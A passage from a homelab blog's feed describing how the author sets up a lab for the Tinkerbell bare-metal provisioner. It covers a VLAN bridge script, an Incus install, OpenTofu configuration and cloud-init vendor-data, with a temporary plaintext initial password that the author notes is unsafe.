</span></span><span style="display:flex;"><span>  <span style="color:#f92672">image</span>: <span style="color:#ae81ff">quay.io/tinkerbell/actions/writefile:latest</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">timeout</span>: <span style="color:#ae81ff">90</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">environment</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">DEST_DISK</span>: {{ <span style="color:#ae81ff">`{{ formatPartition ( index .Hardware.Disks 0 ) 2 }}` }}</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">FS_TYPE</span>: <span style="color:#ae81ff">ext4</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">DEST_PATH</span>: <span style="color:#ae81ff">/etc/cloud/cloud.cfg.d/90-installer-network.cfg</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">UID</span>: <span style="color:#ae81ff">0</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">GID</span>: <span style="color:#ae81ff">0</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">MODE</span>: <span style="color:#ae81ff">0600</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">DIRMODE</span>: <span style="color:#ae81ff">0700</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">CONTENTS</span>: |<span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      # Removed during provisioning</span>
</span></span></code></pre></div><p>This task is executed after the image is dd&rsquo;d onto the disk. It mounts the root
partition and overwrites the file&rsquo;s content with a single comment.</p>
<p>But even after that, I was still not getting my cloud-init user config applied.
After some more searching, I found the file <code>/run/cloud-init/cloud-init-generator.log</code>
with the following content:</p>
<pre tabindex="0"><code>ds-identify rc=1
cloud-init is enabled but no datasource found, disabling
</code></pre><p>I could have avoided this problem by following Tinkerbell&rsquo;s <a href="https://tinkerbell.org/docs/integrations/cloudinit/">cloud-init docs</a>.
There, the example contains two more tasks:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;add cloud-init config&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">image</span>: <span style="color:#ae81ff">quay.io/tinkerbell/actions/writefile:latest</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">timeout</span>: <span style="color:#ae81ff">90</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">environment</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">DEST_DISK</span>: {{ <span style="color:#ae81ff">`{{ formatPartition ( index .Hardware.Disks 0 ) 2 }}` }}</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">DEST_PATH</span>: <span style="color:#ae81ff">/etc/cloud/cloud.cfg.d/10_tinkerbell.cfg</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">DIRMODE</span>: <span style="color:#e6db74">&#34;0700&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">FS_TYPE</span>: <span style="color:#ae81ff">ext4</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">GID</span>: <span style="color:#e6db74">&#34;0&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">MODE</span>: <span style="color:#e6db74">&#34;0600&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">UID</span>: <span style="color:#e6db74">&#34;0&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">CONTENTS</span>: |<span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      datasource:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        Ec2:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          metadata_urls: [&#34;http://203.0.113.200:7172&#34;]
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          strict_id: false
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      manage_etc_hosts: localhost
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      warnings:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        dsid_missing_source: off</span>
</span></span><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;add cloud-init ds-identity&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">image</span>: <span style="color:#ae81ff">quay.io/tinkerbell/actions/writefile:latest</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">timeout</span>: <span style="color:#ae81ff">90</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">environment</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">DEST_DISK</span>: {{ <span style="color:#ae81ff">`{{ formatPartition ( index .Hardware.Disks 0 ) 2 }}` }}</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">FS_TYPE</span>: <span style="color:#ae81ff">ext4</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">DEST_PATH</span>: <span style="color:#ae81ff">/etc/cloud/ds-identify.cfg</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">UID</span>: <span style="color:#ae81ff">0</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">GID</span>: <span style="color:#ae81ff">0</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">MODE</span>: <span style="color:#ae81ff">0600</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">DIRMODE</span>: <span style="color:#ae81ff">0700</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">CONTENTS</span>: |<span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      datasource: Ec2</span>
</span></span></code></pre></div><p>The first task adds some basic cloud-init configuration, most importantly the
URL for the metadata service. For most cloud providers, this is a hardcoded IP
(169.254.169.254 in AWS&rsquo; case) that&rsquo;s the same across their entire cloud, but here
it will be Tinkerbell&rsquo;s public IP as configured
in the Helm chart&rsquo;s <code>values.yaml</code>. The other important setting is hardcoding
the data source to <code>Ec2</code>, because cloud-init&rsquo;s default search mechanism checks
the aforementioned default IP, where it won&rsquo;t find any metadata service in my
Homelab.</p>
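<p>After a reboot, it&rsquo;s easy to confirm that ds-identify now picks the Ec2 datasource
instead of giving up. A few places to look (paths may differ slightly between
cloud-init versions):</p>
<pre tabindex="0"><code># Which datasource did cloud-init settle on?
cloud-init status --long
cat /run/cloud-init/cloud-id
# ds-identify's reasoning, useful when it still refuses to find a datasource
cat /run/cloud-init/ds-identify.log
</code></pre>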
<p>With all of this configuration done, I was able to delete the VM one last time,
reset the Workflow object of Tinkerbell, and recreate the VM. After a couple of
minutes, I was greeted with a fully functional VM, ready for Ansible, with no
further manual intervention from my side.</p>
<h2 id="final-thoughts">Final thoughts</h2>
<p>I really like what I&rsquo;ve seen from Tinkerbell so far. I also like how well
cloud-init works. Even if I don&rsquo;t end up deploying Tinkerbell, I will likely
change my new host setup to use a generic image and then do the customization
with cloud-init.</p>
<p>The next steps will be the more complicated ones. There are two basic things
I will need to figure out. First, how to boot Raspberry Pi 4 and 5 into iPXE so
I can use Tinkerbell for provisioning them. From some initial research, it looks
like that should be possible. The bigger issue might be diskless hosts. Sure,
I can set up iPXE and provisioning - but the problem is then how to tell them
to boot into their own system, instead of Tinkerbell&rsquo;s provisioning, once they&rsquo;ve
been properly set up.</p>
<p>Let&rsquo;s see how those next experiments turn out.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Tinkerbell Part II: Lab Setup</title>
      <link>https://blog.mei-home.net/posts/tinkerbell-2-lab-setup/</link>
      <pubDate>Thu, 12 Jun 2025 00:30:11 +0200</pubDate>
      <guid>https://blog.mei-home.net/posts/tinkerbell-2-lab-setup/</guid>
      <description>Setting up the lab for Tinkerbell</description>
      <content:encoded><![CDATA[<p>A description of my lab setup for tinkering with Tinkerbell.</p>
<p>This is part 2 of my <a href="https://blog.mei-home.net/tags/series-tinkerbell/">Tinkerbell series</a>.</p>
<p><del>For my Tinkerbell tinkering lab</del> Actually, no. Let&rsquo;s start with: How
did I not come up with &ldquo;tinkering with Tinkerbell&rdquo; until the second post
of this series? You may tsk tsk tsk disapprovingly at your screen now.</p>
<p>For my Tinkerbell tinkering lab, I decided to run it on my desktop machine.
This is because previous work on network booting has shown that I definitely want
direct access to the netbooting machine&rsquo;s TTY. And that&rsquo;s easiest when it runs
on my desktop. It also makes things like packet capturing easier. So I needed the
following things in my lab setup:</p>
<ol>
<li>Fresh VLAN</li>
<li>VM tooling on my desktop</li>
<li>Ubuntu server VM for Tinkerbell</li>
<li>k3s, to run Tinkerbell</li>
</ol>
<p>In this post, I will go into a bit more detail on what that setup looks like.</p>
<h2 id="new-vlan">New VLAN</h2>
<p>In my Homelab VLAN, I&rsquo;ve already got two DHCP servers. One is from my OPNsense
router, providing the IPAM (IP Address Management) side of things. Then there&rsquo;s
also a <a href="https://thekelleys.org.uk/dnsmasq/doc.html">dnsmasq</a> instance running in
proxy mode and supplying the necessary info for netbooting, also serving as a
TFTP server.</p>
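<p>For the curious, such a proxy-DHCP setup boils down to just a handful of dnsmasq
options. A rough sketch only - the subnet is a placeholder, and the boot-file options,
which differ between BIOS and UEFI clients, are left out:</p>
<pre tabindex="0"><code># proxyDHCP: leave address assignment to the real DHCP server,
# only chime in with the netboot information and serve files via TFTP
dnsmasq --port=0 \
        --dhcp-range=10.86.5.0,proxy \
        --enable-tftp \
        --tftp-root=/srv/tftp
# (boot-file/pxe-service options omitted; they depend on the client firmware)
</code></pre>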
<p>This is definitely something I will need to tackle during the labbing phase - what
to do about diskless netbooting machines? For their first boot, they should go
with Tinkerbell for initial provisioning. But all subsequent boots should then
use the dnsmasq server and boot their normal kernel.</p>
<p>But for now, I&rsquo;m avoiding having to think about this by creating a separate VLAN
so Tinkerbell&rsquo;s DHCP doesn&rsquo;t disrupt the netbooting hosts. If you&rsquo;re curious about
the details, head to <a href="https://blog.mei-home.net/posts/vlans/">this post</a>. For now, suffice
it to say that I configured another fresh VLAN, let&rsquo;s say with the ID <code>512</code>, and
added it as a trunk VLAN to the router&rsquo;s main interface. Same for the rest of the
network path to my desktop. There, the VLAN is also configured trunked, so that
packets arrive on the host with their VLAN tag intact, allowing me to configure
a special interface on the host for just those packets. Importantly, I did not
set the desktop&rsquo;s switch port to autotag incoming packets (coming from the desktop)
with that VLAN ID. So all packets for this VLAN come into the
host tagged, and they also have to leave the host tagged.</p>
<p>Because I intended to have the lab up only while actively working on it, I didn&rsquo;t
do any config file changes, but instead wrote a small bash script to set up the
networking via <code>ip</code> commands:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span><span style="color:#75715e">#!/bin/bash
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>
</span></span><span style="display:flex;"><span>LAN<span style="color:#f92672">=</span>eth0
</span></span><span style="display:flex;"><span>VLANID<span style="color:#f92672">=</span><span style="color:#ae81ff">512</span>
</span></span><span style="display:flex;"><span>VLAN<span style="color:#f92672">=</span>$LAN.$VLANID
</span></span><span style="display:flex;"><span>BRIDGE<span style="color:#f92672">=</span>br
</span></span><span style="display:flex;"><span>IP<span style="color:#f92672">=</span>203.0.113.1/32
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">function</span> setup_net <span style="color:#f92672">{</span>
</span></span><span style="display:flex;"><span>  ip link add link $LAN name $VLAN type vlan id $VLANID
</span></span><span style="display:flex;"><span>  ip link add name $BRIDGE type bridge
</span></span><span style="display:flex;"><span>  ip link set $VLAN master $BRIDGE
</span></span><span style="display:flex;"><span>  ip link set $BRIDGE up
</span></span><span style="display:flex;"><span>  ip link set $VLAN up
</span></span><span style="display:flex;"><span>  ip addr add $IP dev $BRIDGE
</span></span><span style="display:flex;"><span><span style="color:#f92672">}</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">function</span> teardown_net <span style="color:#f92672">{</span>
</span></span><span style="display:flex;"><span>  ip link set $BRIDGE down
</span></span><span style="display:flex;"><span>  ip link set $VLAN down
</span></span><span style="display:flex;"><span>  ip link delete $BRIDGE
</span></span><span style="display:flex;"><span>  ip link delete $VLAN
</span></span><span style="display:flex;"><span><span style="color:#f92672">}</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">while</span> <span style="color:#f92672">[[</span> $# -gt <span style="color:#ae81ff">0</span> <span style="color:#f92672">]]</span>; <span style="color:#66d9ef">do</span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">case</span> $1 in
</span></span><span style="display:flex;"><span>    up<span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span>      setup_net
</span></span><span style="display:flex;"><span>      shift
</span></span><span style="display:flex;"><span>      ;;
</span></span><span style="display:flex;"><span>    down<span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span>      teardown_net
</span></span><span style="display:flex;"><span>      shift
</span></span><span style="display:flex;"><span>      ;;
</span></span><span style="display:flex;"><span>    *<span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span>      echo <span style="color:#e6db74">&#34;Unknown argument&#34;</span>
</span></span><span style="display:flex;"><span>      exit <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>      ;;
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">esac</span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">done</span>
</span></span></code></pre></div><p>This script creates two new network devices. The first one, called <code>eth0.512</code>,
will serve as the VLAN interface, sitting &ldquo;on top&rdquo; of <code>eth0</code>, which is my physical
NIC. The <code>PHYSICAL.VLAN</code> naming is only a convention, not a requirement.
Then there&rsquo;s the <code>br</code> bridge, which can be imagined as a &ldquo;virtual switch&rdquo; simulated
by the Linux kernel. Multiple interfaces can be connected to it, and because the
<code>eth0.512</code> interface is part of it, any interface connected to the bridge
has access to the rest of the network.</p>
<p>This is a simple, VLAN-unaware bridge, so packets sent between the hosts on the
bridge are not tagged. But any packets
which go out into the wider network do so via the <code>eth0.512</code> interface, and
consequently get tagged with the <code>512</code> VLAN ID.</p>
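<p>The result is easy to inspect with iproute2, which is also how I sanity-checked the setup:</p>
<pre tabindex="0"><code># Show the VLAN ID and the bridge membership of the new interfaces
ip -d link show eth0.512   # should show "vlan protocol 802.1Q id 512"
bridge link show           # lists eth0.512 (and later the VM taps) as bridge ports
ip -br addr show br        # the lab IP should sit on the bridge, not on eth0.512
</code></pre>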
<p>Now, one very important fact is that the IP address needs to be assigned to the
bridge, not to the VLAN interface. I initially had it assigned to the VLAN
interface, and it did not work at all: packets did not arrive on the router
from the new VLAN 512 interface, and packets sent from other hosts to the IP
assigned to the interface never arrived either.
I&rsquo;m honestly not really able to explain why that was. Which tells
me, yet again, that at some point I need to take a tour through the Linux
kernel&rsquo;s networking stack.</p>
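<p>If anyone wants to poke at the same problem: watching where the tagged frames actually
show up is the quickest way I know to narrow it down, for example:</p>
<pre tabindex="0"><code># Watch VLAN 512 frames on the physical NIC (tagged) ...
tcpdump -eni eth0 vlan 512
# ... versus the untagged view on the VLAN interface and the bridge
tcpdump -eni eth0.512
tcpdump -eni br
</code></pre>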
<h2 id="vm-setup">VM setup</h2>
<p>I had to think a lot about this part, surprisingly. My normal go-to tool for VMs
has always been LXD. I ran my VMs via it for a couple of years during the
&ldquo;one host, multiple VMs&rdquo; phase of my Homelab. Then I pulled it out again to supply
some VMs during the k8s migration. I&rsquo;m pretty comfortable with it, and I like that
it has a Terraform provider so I could put my VM configs under version control.</p>
<p>In <a href="https://blog.mei-home.net/posts/testvm-for-netbooting/">some previous desktop VM&rsquo;ing</a>,
I had opted to set up the VM directly with the <code>qemu-system</code> command. But I wanted
a little bit more structure this time, because I expect this lab to last a bit
longer.</p>
<p>These were the two extremes I was thinking about - LXD (or rather, <a href="https://linuxcontainers.org/incus/">Incus</a>),
requiring a daemon to run and some additional setup, or a bash script for
launching the VM via <code>qemu-system</code>. I was looking for something in the middle -
without a daemon, but a bit less DIY than a bash script.</p>
<p>Initially, <a href="https://developer.hashicorp.com/vagrant">Vagrant</a> looked exactly
like what I was looking for. I was a bit dismayed when I saw that it was seemingly
written in Ruby though. Nothing wrong with Ruby, but it&rsquo;s not something I have
installed on my desktop. But I went ahead and got right to writing a Vagrant
file - just to find this note on <a href="https://documentation.ubuntu.com/public-images/public-images-explanation/vagrant/#support">Ubuntu&rsquo;s Vagrant page</a>:</p>
<blockquote>
<p>Vagrant has been dropped by Ubuntu due to the adoption of the Business Source License (BSL). Following this change, Canonical will no longer publish Vagrant images directly starting with Ubuntu 24.04 LTS (Noble Numbat).</p></blockquote>
<p>So much for that idea. And I didn&rsquo;t want to run any other distro, as the entire
Homelab is based on Ubuntu, and at least for now I don&rsquo;t intend to change that.
I then looked into stuff like <a href="https://www.libvirt.org/manpages/virsh.html">virsh</a>.
But that turned out to also require a daemon. And at that point I decided
that Incus really was the best choice - at least I was already experienced with
it, so I could spend more time on setting up Tinkerbell and less on setting up
the lab.</p>
<p>With that decision made, I ran the Incus install:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>emerge -av incus
</span></span></code></pre></div><p>The Gentoo Wiki has a <a href="https://wiki.gentoo.org/wiki/Incus">good page on Incus</a>.
Following it, I also added my user to the required groups for being allowed to
use Incus directly:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>usermod --append --groups incus,incus-admin &lt;MYUSER&gt;
</span></span></code></pre></div><p>Then I could launch Incus like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>rc-service incus start
</span></span></code></pre></div><p>As mentioned, I only wanted the lab to be up when I&rsquo;m actually working with it, so
I did not set it to autostart.</p>
<p>Finally, I initialized Incus with this command:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>incus admin init
</span></span></code></pre></div><p>I basically said &ldquo;no&rdquo; to everything, so I could set up stuff like default
networking and the default storage provider in OpenTofu later and put that config
under version control.</p>
<h2 id="setting-up-the-master-vm-with-opentofu">Setting up the Master VM with OpenTofu</h2>
<p>To configure Incus, I made use of the <a href="https://search.opentofu.org/provider/lxc/incus/v0.3.1">OpenTofu Incus provider</a>.
I didn&rsquo;t use the Incus CLI because I wanted to put the config under source control.
Even though I&rsquo;m still on <a href="https://developer.hashicorp.com/terraform">Terraform</a>
for my Homelab as a whole, I decided to go with <a href="https://opentofu.org/">OpenTofu</a>
for the lab. I intended to keep the two states, Home(prod)lab and actual lab,
separate anyway. And I saw this as a good chance to kick the tires on OpenTofu.</p>
<p>My OpenTofu <code>main.tf</code> looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-hcl" data-lang="hcl"><span style="display:flex;"><span><span style="color:#66d9ef">terraform</span> {
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">backend</span> <span style="color:#e6db74">&#34;local&#34;</span> {
</span></span><span style="display:flex;"><span>    path <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;.terraform/terraform-main.tfstate&#34;</span>
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">required_providers</span> {
</span></span><span style="display:flex;"><span>    incus <span style="color:#f92672">=</span> {
</span></span><span style="display:flex;"><span>      source <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;lxc/incus&#34;</span>
</span></span><span style="display:flex;"><span>      version <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;0.3.1&#34;</span>
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">provider</span> <span style="color:#e6db74">&#34;incus&#34;</span> {
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">remote</span> {
</span></span><span style="display:flex;"><span>    name <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;local&#34;</span>
</span></span><span style="display:flex;"><span>    default <span style="color:#f92672">=</span> <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    scheme <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;unix&#34;</span>
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>Nothing special here at all. So next, setting up some defaults for the VMs. First
step: Some storage. I just went with local storage - in the name of not overcomplicating
the lab setup unnecessarily (yes, I <em>can</em> see that smirk on your face right now):</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-hcl" data-lang="hcl"><span style="display:flex;"><span><span style="color:#66d9ef">resource</span> <span style="color:#e6db74">&#34;incus_storage_pool&#34; &#34;local-dir&#34;</span> {
</span></span><span style="display:flex;"><span>  name <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;local-dir&#34;</span>
</span></span><span style="display:flex;"><span>  description <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;Local host storage pool&#34;</span>
</span></span><span style="display:flex;"><span>  driver <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;dir&#34;</span>
</span></span><span style="display:flex;"><span>  config <span style="color:#f92672">=</span> {
</span></span><span style="display:flex;"><span>    source <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;/var/lib/incus/storage-pools/local-dir&#34;</span>
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>Next comes the base profile for the VMs:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-hcl" data-lang="hcl"><span style="display:flex;"><span><span style="color:#66d9ef">resource</span> <span style="color:#e6db74">&#34;incus_profile&#34; &#34;base&#34;</span> {
</span></span><span style="display:flex;"><span>  name <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;base&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  config <span style="color:#f92672">=</span> {
</span></span><span style="display:flex;"><span>    &#34;boot.autostart&#34; <span style="color:#f92672">=</span> <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>    &#34;cloud-init.vendor-data&#34; <span style="color:#f92672">=</span> <span style="color:#960050;background-color:#1e0010">&lt;&lt;-</span><span style="color:#66d9ef">EOT</span><span style="color:#75715e">
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">#cloud-config
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span><span style="color:#66d9ef">users</span><span style="color:#960050;background-color:#1e0010">:</span>
</span></span><span style="display:flex;"><span>  <span style="color:#960050;background-color:#1e0010">-</span> <span style="color:#66d9ef">name</span><span style="color:#960050;background-color:#1e0010">:</span> <span style="color:#66d9ef">ansible</span><span style="color:#960050;background-color:#1e0010">-</span><span style="color:#66d9ef">user</span>
</span></span><span style="display:flex;"><span>    sudo: ALL<span style="color:#f92672">=</span>(<span style="color:#66d9ef">ALL</span><span style="color:#960050;background-color:#1e0010">:</span><span style="color:#66d9ef">ALL</span>) <span style="color:#66d9ef">ALL</span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">ssh_authorized_keys</span><span style="color:#960050;background-color:#1e0010">:</span>
</span></span><span style="display:flex;"><span>      - from<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;192.0.2.100&#34;</span> <span style="color:#66d9ef">ssh</span><span style="color:#960050;background-color:#1e0010">-</span><span style="color:#66d9ef">ed25519</span> <span style="color:#66d9ef">AAAAC3NzaC1lZDI1NTE5AAAAIOaxn8l16GNyBEgYzWO0BAko9fw8kkIq9tbels3hXdUt</span> <span style="color:#66d9ef">user</span><span style="color:#960050;background-color:#1e0010">@</span><span style="color:#66d9ef">foo</span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">shell</span><span style="color:#960050;background-color:#1e0010">:</span> <span style="color:#960050;background-color:#1e0010">/</span><span style="color:#66d9ef">bin</span><span style="color:#960050;background-color:#1e0010">/</span><span style="color:#66d9ef">bash</span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">packages</span><span style="color:#960050;background-color:#1e0010">:</span>
</span></span><span style="display:flex;"><span>  <span style="color:#960050;background-color:#1e0010">-</span> <span style="color:#66d9ef">sudo</span>
</span></span><span style="display:flex;"><span>  <span style="color:#960050;background-color:#1e0010">-</span> <span style="color:#66d9ef">python3</span>
</span></span><span style="display:flex;"><span>  <span style="color:#960050;background-color:#1e0010">-</span> <span style="color:#66d9ef">openssh</span><span style="color:#960050;background-color:#1e0010">-</span><span style="color:#66d9ef">server</span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">chpasswd</span><span style="color:#960050;background-color:#1e0010">:</span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">expire</span><span style="color:#960050;background-color:#1e0010">:</span> <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">users</span><span style="color:#960050;background-color:#1e0010">:</span>
</span></span><span style="display:flex;"><span>    <span style="color:#960050;background-color:#1e0010">-</span> <span style="color:#66d9ef">name</span><span style="color:#960050;background-color:#1e0010">:</span> <span style="color:#66d9ef">ansible</span><span style="color:#960050;background-color:#1e0010">-</span><span style="color:#66d9ef">user</span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">password</span><span style="color:#960050;background-color:#1e0010">:</span> <span style="color:#66d9ef">password123</span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">type</span><span style="color:#960050;background-color:#1e0010">:</span> <span style="color:#66d9ef">text</span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">EOT</span>
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">device</span> {
</span></span><span style="display:flex;"><span>    name <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;network&#34;</span>
</span></span><span style="display:flex;"><span>    type <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;nic&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    properties <span style="color:#f92672">=</span> {
</span></span><span style="display:flex;"><span>      nictype <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;bridged&#34;</span>
</span></span><span style="display:flex;"><span>      parent <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;br&#34;</span>
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>Let&rsquo;s start with the network config. Here, I&rsquo;m configuring the VM to make use
of the <code>br</code> bridge I created above. The <code>bridged</code> NIC type creates a NIC
that is attached to the given bridge, meaning the VM can use it to communicate
with the other hosts connected to that bridge. In my setup, this config also
allows all connected devices to communicate with the outside world.</p>
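<p>To sanity-check that config on the Incus host itself, standard Linux tooling
is enough. This is just a quick sketch, assuming the bridge really is called
<code>br</code> as in the profile above:</p>
<pre tabindex="0"><code># Show the bridge interface and its state on the host
ip link show br
# List which interfaces (e.g. the VM TAP devices) are attached to the bridge
bridge link show
</code></pre>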
<p>Then there&rsquo;s also the <code>vendor-data</code> config. This is a <a href="https://cloud-init.io/">cloud-init</a>
configuration file. Cloud-init was introduced for Ubuntu, but has since been adopted
by a number of other distributions as well. Its main use is the initial
configuration of a generic OS image. On systems supporting cloud-init, several
stages (implemented e.g. as systemd services) run during boot. They can configure
the network, create users, install packages, set passwords and do a whole host of
other things. Generally, these configs are only executed once, during the
initial boot of the machine. Switching to cloud-init is one of the goals of
my Tinkerbell migration. Up to now, I&rsquo;ve been creating individual images for
each new host, which contained pretty much only the above configuration. That
was a bit of a waste, considering that I really only needed to do some very
light customization, with the sole goal being that after first boot, the machine
would be ready for my main Ansible playbook to run.</p>
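<p>A handy way to check whether cloud-init actually ran, and only once, is to ask
it from inside the guest. A small sketch:</p>
<pre tabindex="0"><code># Overall result of the last (usually the first) boot run
cloud-init status --long
# The log contains the details of every module that was executed
less /var/log/cloud-init.log
</code></pre>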
<p>The cloud-init config shown in the profile above does exactly that. It installs Python and
the OpenSSH server. Surprisingly, the Incus Ubuntu images don&rsquo;t come with SSH
configured by default. Then I&rsquo;m creating the <code>ansible-user</code> user, which is the
user all of my Ansible playbooks use for connecting to the hosts in my Homelab.
The config adds the user itself, sets the shell and adds my Ansible SSH key
to the <code>authorized_keys</code>, allowing access only from my Command and Control host.
The user also has full sudo access.
Finally, I&rsquo;m setting a simple initial password, which is then changed to the
actual password during the first Ansible playbook run. This is probably a bit
unsafe, and I plan to look into doing it better; for now it serves reasonably
well, because I need a password for sudo access even for that first playbook run.</p>
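<p>One way to make this slightly less unsafe would be to put a pre-hashed password
into the config instead of a plaintext one. This is only a sketch of the idea, not
what I&rsquo;m currently doing; the resulting hash would replace the plaintext value in
the <code>chpasswd</code> users list:</p>
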